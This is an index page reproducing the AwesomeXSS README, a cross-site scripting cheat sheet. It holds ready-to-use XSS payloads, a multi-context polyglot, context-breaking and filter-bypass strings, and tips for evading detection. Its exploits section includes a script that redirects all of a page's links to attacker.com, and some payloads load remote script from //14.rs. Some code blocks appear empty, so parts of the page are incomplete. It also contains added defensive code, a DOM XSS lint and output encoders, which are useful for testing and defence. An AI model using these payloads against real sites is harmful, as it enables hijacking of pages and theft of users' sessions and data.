Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/s0md3v/AwesomeXSS
Awesome XSS stuff
List: AwesomeXSS
payload payload-list xss xss-cheatsheet xss-detection xss-payloads
Last synced: 1 day ago
- Host: GitHub
- URL: https://github.com/s0md3v/AwesomeXSS
- Owner: s0md3v
- License: mit
- Created: 2018-03-11T14:35:30.000Z (over 6 years ago)
- Default Branch: master
- Last Pushed: 2024-04-23T09:21:44.000Z (6 months ago)
- Last Synced: 2024-10-29T15:10:44.754Z (5 days ago)
- Topics: payload, payload-list, xss, xss-cheatsheet, xss-detection, xss-payloads
- Language: JavaScript
- Size: 3.48 MB
- Stars: 4,774
- Watchers: 239
- Forks: 765
- Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-web-security - AwesomeXSS - Written by [@s0md3v](https://github.com/s0md3v). (Introduction / XSS - Cross-Site Scripting)
- qazbnm456-awesome-web-security - AwesomeXSS - Written by [@s0md3v](https://github.com/s0md3v). (Introduction / XSS - Cross-Site Scripting)
- awesome-security-collection - **2759** stars
- awesome-hacking-lists - s0md3v/AwesomeXSS - Awesome XSS stuff (JavaScript)
README
# AwesomeXSS
This repository is a collection of Awesome XSS resources. Contributions are welcome and should be submitted via an issue.

### Awesome contents
- [Challenges](https://github.com/s0md3v/AwesomeXSS#awesome-challenges)
- [Reads & Presentations](https://github.com/s0md3v/AwesomeXSS#awesome-reads--presentations)
- [Tools](https://github.com/s0md3v/AwesomeXSS#awesome-tools)
- [Mind maps](https://github.com/s0md3v/AwesomeXSS#awesome-xss-mind-maps)
- [DOM XSS](https://github.com/s0md3v/AwesomeXSS#awesome-dom-xss)
- [Payloads](https://github.com/s0md3v/AwesomeXSS#awesome-payloads)
- [Polyglots](https://github.com/s0md3v/AwesomeXSS#awesome-polyglots)
- [Tags and event handlers](https://github.com/s0md3v/AwesomeXSS#awesome-tags--event-handlers)
- [Context breaking](https://github.com/s0md3v/AwesomeXSS#awesome-context-breaking)
- [HTML context](https://github.com/s0md3v/AwesomeXSS#html-context)
- [Attribute context](https://github.com/s0md3v/AwesomeXSS#attribute-context)
- [JavaScript context](https://github.com/s0md3v/AwesomeXSS#javascript-context)
- [Confirm Variants](https://github.com/s0md3v/AwesomeXSS#awesome-confirm-variants)
- [Exploits](https://github.com/s0md3v/AwesomeXSS#awesome-exploits)
- [Probing](https://github.com/s0md3v/AwesomeXSS#awesome-probing)
- [Bypassing](https://github.com/s0md3v/AwesomeXSS#awesome-bypassing)
- [Encoding](https://github.com/s0md3v/AwesomeXSS#awesome-encoding)
- [Tips & tricks](https://github.com/s0md3v/AwesomeXSS#awesome-tips--tricks)

### Awesome Challenges
- [prompt.ml](https://prompt.ml)
- [alf.nu/alert1](https://alf.nu/alert1)
- [xss-game.appspot.com](https://xss-game.appspot.com)
- [polyglot.innerht.ml](https://polyglot.innerht.ml)
- [sudo.co.il/xss](http://sudo.co.il/xss)
- [root-me.org](https://www.root-me.org/?page=recherche&lang=en&recherche=xss)
- [chefsecure.com](https://chefsecure.com/courses/xss/challenges)
- [wechall.net](https://www.wechall.net/challs/XSS)
- [codelatte.id/labs/xss](https://codelatte.id/labs/xss)

### Awesome Reads & Presentations
- [Bypassing XSS Detection Mechanisms](https://github.com/s0md3v/MyPapers/tree/master/Bypassing-XSS-detection-mechanisms)
- [XSS in Facebook via PNG Content Type](https://whitton.io/articles/xss-on-facebook-via-png-content-types/)
- [How I met your girlfriend](https://www.youtube.com/watch?v=fWk_rMQiDGc)
- [How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour](https://www.youtube.com/watch?v=9ADubsByGos)
- [Blind XSS](https://www.youtube.com/watch?v=OT0fJEtz7aE)
- [Copy Pest](https://www.slideshare.net/x00mario/copypest)

### Awesome Tools
- [XSStrike](https://github.com/UltimateHackers/XSStrike)
- [BeEF](https://github.com/beefproject/beef)
- [JShell](https://github.com/UltimateHackers/JShell)

### Awesome XSS Mind Maps
A beautiful XSS mind map by Jack Masa is [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/jackmasa-mind-map.png).

### Awesome DOM XSS
- Does your input go into a sink? `Vulnerable`
- It doesn't? `Not vulnerable`

**Source**: An input that could be controlled by an external (untrusted) source.
```
document.URL
document.documentURI
document.URLUnencoded (IE 5.5 or later Only)
document.baseURI
location
location.href
location.search
location.hash
location.pathname
document.cookie
document.referrer
window.name
history.pushState()
history.replaceState()
localStorage
sessionStorage
```

**Sink**: A potentially dangerous method that could lead to a vulnerability, in this case a DOM-based XSS.
```
eval
Function
setTimeout
setInterval
setImmediate
execScript
crypto.generateCRMFRequest
ScriptElement.src
ScriptElement.text
ScriptElement.textContent
ScriptElement.innerText
anyTag.onEventName
document.write
document.writeln
anyElement.innerHTML
Range.createContextualFragment
window.location
document.location
```

This comprehensive list of sinks and sources is taken from [domxsswiki](https://github.com/wisec/domxsswiki).
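The source-to-sink rule above can be turned into a simple code-review check. The following is an added example written for this page, not code from AwesomeXSS or domxsswiki, and the sample lines it scans are constructed. It flags any statement in which one of the listed sources appears together with one of the listed sinks, and it reports the script-element-only properties (`src`, `text`, `textContent`, `innerText`) as "review" rather than "high" because, from text alone, it cannot tell a `<script>` element from a `<div>`.

```javascript
// Added example, not code from the AwesomeXSS README or from domxsswiki:
// a line-oriented lint that reports statements in which a DOM XSS source
// from the list above meets a sink from the list above. It is a review
// heuristic, not taint analysis: data that reaches a sink through a
// variable assigned on another line is not tracked.

const SOURCES = [
  "document.URL", "document.documentURI", "document.URLUnencoded",
  "document.baseURI", "location.href", "location.search", "location.hash",
  "location.pathname", "document.cookie", "document.referrer", "window.name",
  "localStorage", "sessionStorage",
  "location", // bare `location` last, so the longer forms are matched first
];

// Sinks that parse or execute their argument whatever element is involved.
const HIGH_SINKS = [
  "eval", "Function", "setTimeout", "setInterval", "setImmediate", "execScript",
  "crypto.generateCRMFRequest", "document.write", "document.writeln",
  ".innerHTML", ".createContextualFragment", "window.location", "document.location",
];
// Properties that are only a sink on a <script> element; the lint cannot see
// the element type, so hits on these are reported for manual review.
const REVIEW_SINKS = [".src", ".text", ".textContent", ".innerText"];

const escapeRe = (s) => s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
// A leading \b only makes sense when the name starts with a word character.
const alt = (names) =>
  names.map((n) => (n.startsWith(".") ? "" : "\\b") + escapeRe(n)).join("|");

const SOURCE_RE = new RegExp("(?:" + alt(SOURCES) + ")\\b", "g");
// `.onclick =`-style handler assignments cover the page's "anyTag.onEventName".
const HIGH_RE = new RegExp("(?:" + alt(HIGH_SINKS) + ")\\b|\\.on[a-z]+\\s*=");
const REVIEW_RE = new RegExp("(?:" + alt(REVIEW_SINKS) + ")\\b");

// Return the first sink on a line, with its severity and character span.
function classifySink(line) {
  const high = line.match(HIGH_RE);
  if (high) return { severity: "high", label: high[0], start: high.index, end: high.index + high[0].length };
  const review = line.match(REVIEW_RE);
  if (review) return { severity: "review", label: review[0], start: review.index, end: review.index + review[0].length };
  return null;
}

// Scan a block of client-side JavaScript line by line.
function findDomXssCandidates(code) {
  const findings = [];
  code.split("\n").forEach((text, i) => {
    const sink = classifySink(text);
    if (!sink) return;
    for (const m of text.matchAll(SOURCE_RE)) {
      // Skip the `location` that is part of the sink name itself (window.location = ...).
      if (m.index >= sink.start && m.index < sink.end) continue;
      findings.push({ line: i + 1, severity: sink.severity, sink: sink.label, source: m[0], code: text.trim() });
      break; // one finding per line is enough for review
    }
  });
  return findings;
}

// Constructed sample of client-side code (not from any real project).
const SAMPLE = [
  'const q = new URLSearchParams(location.search).get("q");',              // source only
  'document.getElementById("out").innerHTML = "Results for " + q;',        // sink fed via q: missed, needs data-flow analysis
  'document.getElementById("greet").innerHTML = location.hash.slice(1);',  // high
  'eval(decodeURIComponent(document.cookie));',                             // high
  'window.location = "/home";',                                            // sink with a constant: not reported
  'document.getElementById("greet").textContent = location.hash.slice(1);', // review: safe on a div, a sink on <script>
].join("\n");

const SAMPLE_FINDINGS = findDomXssCandidates(SAMPLE);
for (const f of SAMPLE_FINDINGS) {
  console.log(`line ${f.line} [${f.severity}] ${f.source} -> ${f.sink}: ${f.code}`);
}
```

A hit is a starting point for review, not proof of a bug, and a clean run is not proof of safety: the second sample line reaches `innerHTML` through the variable `q` and is missed, which is why real taint tracking (a DOM XSS scanner, or Trusted Types enforced by the browser) is the stronger control.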
### Awesome Payloads
```
z
[confirm``]"<">z
z/*<script* */prompt()"/ondblclick=`<`[confir\u006d``]>z
click
click<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``
(_=prompt,_(1)) ""><embed src=//14.rs>
<script x=">" src=//15.rs>x
```
### Awesome Polyglots
Here's an XSS polyglot that I made which can break out of 20+ contexts:
```
%0ajavascript:`/*\"/*--><svg onload='/*`
```

An explanation of how it works is [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/polyglot.png).
### Awesome Tags & Event Handlers
- [105 Event Handlers with description](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)
- [200 Event Handlers without description](http://pastebin.com/raw/WwcBmz5J)

Some less-detected event handlers:
```
ontoggle
onauxclick
ondblclick
oncontextmenu
onmouseleave
ontouchcancel
```

Some HTML tags that you will be using:
```
img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video
```

### Awesome Context Breaking
#### HTML Context
Case: `You searched for $input.`
```
```
#### Attribute Context
Case: ``
```
">
```
#### JavaScript Context
Case: `var new something = '$input';`
```
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
```
### Awesome Confirm Variants
Yep, confirm because alert is too mainstream.
```
confirm()
confirm``
(confirm``)
{confirm``}
[confirm``]
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)
```

### Awesome Exploits
##### Replace all links
```javascript
Array.from(document.getElementsByTagName("a")).forEach(function(i) {
i.href = "https://attacker.com";
});
```
##### Source Code Stealer
```html
```
### Awesome Probing
If none of this works, take a look at the **Awesome Bypassing** section.

First of all, enter a non-malicious string like **d3v** and look at the source code to get an idea of the number and contexts of reflections.
Now, for attribute context, check if double quotes (") are being filtered by entering `x"d3v`. If it gets altered to `x&quot;d3v`, chances are that the output is getting properly escaped. If this happens, try doing the same for single quotes (') by entering `x'd3v`; if it gets altered to `x&#39;`, you are doomed. The only thing you can try is encoding.
If the quotes are not being filtered, you can simply try payloads from the **Awesome Context Breaking** section.
For JavaScript context, check which quotes are being used, for example whether they are doing
```
variable = 'value' or variable = "value"
```
Now let's say single quotes (') are in use; in that case enter `x'd3v`. If it gets altered to `x\'d3v`, try escaping the backslash (\) by adding a backslash to your probe, i.e. `x\\'d3v`. If it works, use the following payload:
```
\'-alert()//
```
But if it gets altered to `x\\\'d3v`, the only thing you can try is closing the script tag itself by using
```
```
For simple HTML context, the probe is `x`. If it gets stripped or altered in any way, it means the filter is looking for a pair of `<` and `>`. It can simply be bypassed using
```
```
### Awesome Bypassing
**Note:** None of these payloads use single (') or double quotes (").
- Without event handlers
```
confirm()
```
- Without space
```
```
- Without slash (/)
```
```
- Without equal sign (=)
```
confirm()
```
- Without closing angular bracket (>)
```
```
- Without a valid HTML tag
```
click here
drag it
```
- Bypass tag blacklisting
```
```
### Awesome Encoding
|HTML|Char|Numeric|Description|Hex|CSS (ISO)|JS (Octal)|URL|
|----|----|-------|-----------|----|--------|----------|---|
|`&quot;`|"|`&#34;`|quotation mark|u+0022|\0022|\42|%22|
|`&num;`|#|`&#35;`|number sign|u+0023|\0023|\43|%23|
|`&dollar;`|$|`&#36;`|dollar sign|u+0024|\0024|\44|%24|
|`&percnt;`|%|`&#37;`|percent sign|u+0025|\0025|\45|%25|
|`&amp;`|&|`&#38;`|ampersand|u+0026|\0026|\46|%26|
|`&apos;`|'|`&#39;`|apostrophe|u+0027|\0027|\47|%27|
|`&lpar;`|(|`&#40;`|left parenthesis|u+0028|\0028|\50|%28|
|`&rpar;`|)|`&#41;`|right parenthesis|u+0029|\0029|\51|%29|
|`&ast;`|*|`&#42;`|asterisk|u+002A|\002a|\52|%2A|
|`&plus;`|+|`&#43;`|plus sign|u+002B|\002b|\53|%2B|
|`&comma;`|,|`&#44;`|comma|u+002C|\002c|\54|%2C|
|`&minus;`|-|`&#45;`|hyphen-minus|u+002D|\002d|\55|%2D|
|`&period;`|.|`&#46;`|full stop; period|u+002E|\002e|\56|%2E|
|`&sol;`|/|`&#47;`|solidus; slash|u+002F|\002f|\57|%2F|
|`&colon;`|:|`&#58;`|colon|u+003A|\003a|\72|%3A|
|`&semi;`|;|`&#59;`|semicolon|u+003B|\003b|\73|%3B|
|`&lt;`|<|`&#60;`|less-than|u+003C|\003c|\74|%3C|
|`&equals;`|=|`&#61;`|equals|u+003D|\003d|\75|%3D|
|`&gt;`|>|`&#62;`|greater-than sign|u+003E|\003e|\76|%3E|
|`&quest;`|?|`&#63;`|question mark|u+003F|\003f|\77|%3F|
|`&commat;`|@|`&#64;`|at sign; commercial at|u+0040|\0040|\100|%40|
|`&lsqb;`|\[|`&#91;`|left square bracket|u+005B|\005b|\133|%5B|
|`&bsol;`|\\|`&#92;`|backslash|u+005C|\005c|\134|%5C|
|`&rsqb;`|]|`&#93;`|right square bracket|u+005D|\005d|\135|%5D|
|`&Hat;`|^|`&#94;`|circumflex accent|u+005E|\005e|\136|%5E|
|`&lowbar;`|_|`&#95;`|low line|u+005F|\005f|\137|%5F|
|`&grave;`|\`|`&#96;`|grave accent|u+0060|\0060|\u0060|%60|
|`&lcub;`|{|`&#123;`|left curly bracket|u+007b|\007b|\173|%7b|
|`&verbar;`|\||`&#124;`|vertical bar|u+007c|\007c|\174|%7c|
|`&rcub;`|}|`&#125;`|right curly bracket|u+007d|\007d|\175|%7d|

### Awesome Tips & Tricks
- `http(s)://` can be shortened to `//` or `/\\` or `\\`.
- `document.cookie` can be shortened to `cookie`. It applies to other DOM objects as well.
- alert and other pop-up functions don't need a value, so stop doing `alert('XSS')` and start doing `alert()`.
- You can use `//` to close a tag instead of `>`.
- I have found that `confirm` is the least detected pop-up function so stop using `alert`.
- Quotes around an attribute value aren't necessary as long as it doesn't contain spaces. You can use `<script src=//14.rs>` instead of `<script src="//14.rs">`.
- The shortest HTML context XSS payload is `<script src=//14.rs>` (19 chars).

### Awesome Credits
All the payloads are crafted by me unless specified.
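Both the Awesome Context Breaking cases (the `You searched for $input.` text node and the `'$input'` string literal) and the Awesome Encoding table come down to the same question: which characters change the parser state in a given context, and how to write them so they cannot. The block below is an added example for this page, not code from the AwesomeXSS README; it derives the table's columns for any ASCII character and applies the numeric form as a per-context output encoder. The `renderSearchPage` template and the probe strings it is fed are constructed for the example.

```javascript
// Added example, not code from the AwesomeXSS README: derive the columns of
// the Awesome Encoding table for any ASCII character, then use the numeric
// form as the output encoding that closes the HTML and JavaScript context
// breaks shown under Awesome Context Breaking.

function encodingsOf(ch) {
  const cp = ch.codePointAt(0);
  const hex4 = cp.toString(16).padStart(4, "0");
  return {
    numeric: `&#${cp};`,                                       // HTML decimal character reference
    hex: `u+${hex4.toUpperCase()}`,                            // Unicode code point, as the Hex column writes it
    css: `\\${hex4}`,                                          // CSS escape: backslash + four hex digits
    jsOctal: `\\${cp.toString(8)}`,                            // legacy JS octal escape; a syntax error in strict mode
    url: `%${cp.toString(16).toUpperCase().padStart(2, "0")}`, // percent-encoding of the byte
  };
}

// For HTML text nodes and quoted attribute values: every character that can
// change the parser state becomes a numeric reference, so the browser keeps
// treating the input as data rather than markup.
function encodeForHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'`]/g, (c) => encodingsOf(c).numeric);
}

// For a JavaScript string literal inside a <script> block: everything except
// letters and digits becomes \xHH (or \uHHHH), so no quote, backslash, line
// terminator or "</script" can end the literal or the block.
function encodeForJsString(untrusted) {
  return String(untrusted).replace(/[^A-Za-z0-9]/g, (c) => {
    const cp = c.charCodeAt(0);
    return cp < 0x100
      ? `\\x${cp.toString(16).padStart(2, "0")}`
      : `\\u${cp.toString(16).padStart(4, "0")}`;
  });
}

// The two cases from Awesome Context Breaking, each rendered with the encoder
// for its own context (the page template is constructed for this example).
function renderSearchPage(input) {
  return (
    `<b>You searched for ${encodeForHtml(input)}.</b>\n` +
    `<script>var something = '${encodeForJsString(input)}';</script>`
  );
}

// Constructed probes, in the spirit of the Awesome Probing section.
console.log(encodeForHtml(`"><svg onload=confirm()>`)); // &#34;&#62;&#60;svg onload=confirm()&#62;
console.log(encodeForJsString(`x\\'d3v`));             // x\x5c\x27d3v
console.log(renderSearchPage(`'-alert()-'`));
```

Two details are worth noticing against the table: the JS column's octal form (`\74`) is a syntax error in strict-mode code, which is why the encoder emits `\xHH` instead; and the table's Hex and URL columns mix upper and lower case in the `{`, `|`, `}` rows, whereas the function always emits upper case, which browsers and URL parsers treat identically.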